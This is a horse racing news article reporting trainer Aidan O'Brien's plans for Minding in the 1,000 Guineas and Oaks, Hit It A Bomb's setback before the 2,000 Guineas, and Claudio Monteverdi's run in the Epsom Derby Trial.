AIDAN O’BRIEN has confirmed that Minding, ante-post favourite for the Qipco 1,000 Guineas and Investec Oaks, is an intended runner in both races in a bid to become the first to complete the double since Kazzia in 2002.

In his exclusive stable tour for the Racing Post, O’Brien revealed that Minding is on track for the 1,000 Guineas at Newmarket on Sunday week.

“She’s been doing plenty of half-speeds and is quite forward,” said O’Brien. “We’re happy with her fitness and she’ll be going straight for the Guineas at Newmarket, where she finished off last season by winning the Fillies’ Mile in very good style.

“She showed last year that she handles easy ground well but genuine good ground would be fine for her – she probably wouldn’t want it too fast, though,” he added. “Hopefully she’ll go on to the Oaks.”

O’Brien thwarted an attempt by Coolmore partners Michael Tabor, John Magnier and Derrick Smith to land the double with Legatissimo last year with 50-1 shot Qualify in the Oaks. Minding is a general 7-4 for the Guineas and is 7-2 to score at Epsom on June 3.

Bomb will not make Newmarket

O’Brien also offered plenty of other clues for his Newmarket running plans and beyond. He revealed that Hit It A Bomb, as short as 16-1 for the Qipco 2,000 Guineas, will not make the line-up.

“He did very well over the winter and has got a lot stronger. Unfortunately he’s had a slight setback and won’t be ready for Newmarket,” said O’Brien.

“We won’t force him but he might be ready for the Irish Guineas or, if not, Royal Ascot.”

Claudio Monteverdi to scout out Epsom

Claudio Monteverdi, as low as 14-1 for the Derby on June 4, satisfied his trainer in a piece of work on Monday morning and will be O’Brien’s sole runner in Wednesday’s Investec Derby Trial at Epsom. Ryan Moore will take the ride.

“My daughter Ana rode Claudio Monteverdi this morning and she’s pleased with him,” O’Brien said. “We also had entered Deauville and Unicorn but he will be our only runner in it.

“He’s been good since Leopardstown and we are looking forward to stepping him up in distance. Ryan felt the ground wouldn’t be too bad at Epsom for him.”

O’Brien added that he would not have a runner in Sandown’s bet365 Classic Trial on Friday, a race he won with Imperial Monarch in 2012.
